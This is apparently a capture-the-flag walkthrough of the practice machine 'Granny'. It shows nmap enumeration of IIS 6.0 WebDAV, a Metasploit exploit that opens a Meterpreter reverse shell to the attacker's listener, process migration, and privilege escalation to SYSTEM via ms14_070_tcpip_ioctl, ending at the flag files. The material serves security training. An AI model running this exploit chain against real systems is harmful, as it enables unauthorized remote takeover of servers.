About Granny

Granny

Nmap

Port scan revelals IIS 6 running on this machine.

# nmap -sV -sT -sC -o nmapinitial 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-25 10:55 EST
Nmap scan report for 10.10.10.15
Host is up (0.22s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unkown
|   Server Date: Sat, 25 Jan 2020 15:56:14 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.67 seconds

IIS 6 exploitation

This machine is runnig IIS 6 and searchsploit shows there’s an MSF exploit for it.

# searchsploit IIS 6.0
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path                                  
                                                                                                                                                                                                  | (/usr/share/exploitdb/)                
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure                                                                                                                  | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                                                                                                                           | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                                                                                                                             | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                                                                                                                                      | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)                                                                                                            | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                                                                                                                          | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                                                                                                                       | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                                                                                                                       | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                                                                                                                                     | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                                                                                                                                   | exploits/windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                                                                                                                          | exploits/windows/remote/19033.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result 

Getting a shell with Metasploit.

# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl 
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.46:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.46:4444 -> 10.10.10.15:1030) at 2020-02-01 09:10:35 -0500

meterpreter >

First, start a background process and migrate it to Meterpreter. Using the migrate post module, you can migrate to another process on the victim.

meterpreter > run post/windows/manage/migrate

[*] Running module against GRANNY
[*] Current server process: rundll32.exe (2460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3932
[+] Successfully migrated to process 3932
meterpreter > 

Privilege escalation

I used local_exploit_suggester for finding privilege escalation vulnerabilities.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Several vulnerabilities were found. This time, escalate privileges using ms14_070_tcpip_ioctl.

meterpreter > background
[*] Backgrounding session 1...
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl 
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I have SYSTEM access. And I can now read the flag:

meterpreter > cd ../../../../../
meterpreter > pwd
c:\
meterpreter > ls
Listing: c:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
40777/rwxrwxrwx     0                  dir   2017-04-12 10:27:12 -0400        ADFS
100777/rwxrwxrwx    0                  fil   2017-04-12 10:04:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-04-12 10:04:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-04-12 09:42:38 -0400        Documents and Settings
40777/rwxrwxrwx     0                  dir   2017-04-12 10:17:24 -0400        FPSE_search
100444/r--r--r--    0                  fil   2017-04-12 10:04:44 -0400        IO.SYS
40777/rwxrwxrwx     0                  dir   2017-04-12 10:16:33 -0400        Inetpub
100444/r--r--r--    0                  fil   2017-04-12 10:04:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47772              fil   2007-02-18 07:00:00 -0500        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-04-12 09:43:02 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-04-12 15:02:02 -0400        RECYCLER
40777/rwxrwxrwx     0                  dir   2017-04-12 09:42:38 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-04-12 09:41:07 -0400        WINDOWS
100666/rw-rw-rw-    208                fil   2017-04-12 09:42:08 -0400        boot.ini
100444/r--r--r--    297072             fil   2007-02-18 07:00:00 -0500        ntldr
55611620/rw--w----  45595321274761199  fif   1453862520-01-07 02:04:32 -0500  pagefile.sys
40777/rwxrwxrwx     0                  dir   2017-04-12 10:05:06 -0400        wmpub

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: c:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 10:12:15 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 09:42:38 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 09:42:38 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 15:19:46 -0400  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 10:08:32 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 10:08:31 -0400  NetworkService

meterpreter >

User flag:

meterpreter > cd Lakis
meterpreter > ls
Listing: c:\Documents and Settings\Lakis
========================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-04-12 15:19:46 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 15:19:46 -0400  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Templates
100666/rw-rw-rw-  1024    fil   2017-04-12 15:19:46 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 15:19:46 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: c:\Documents and Settings\Lakis\Desktop
================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 15:19:57 -0400  user.txt

meterpreter > cat user.txt

Root flag:

meterpreter > cd ../../
meterpreter > cd Administrator 
meterpreter > ls
Listing: c:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 10:12:15 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 10:12:15 -0400  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 14:48:10 -0400  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 10:12:15 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 10:12:15 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: c:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 10:28:50 -0400  root.txt

meterpreter > cat root.txt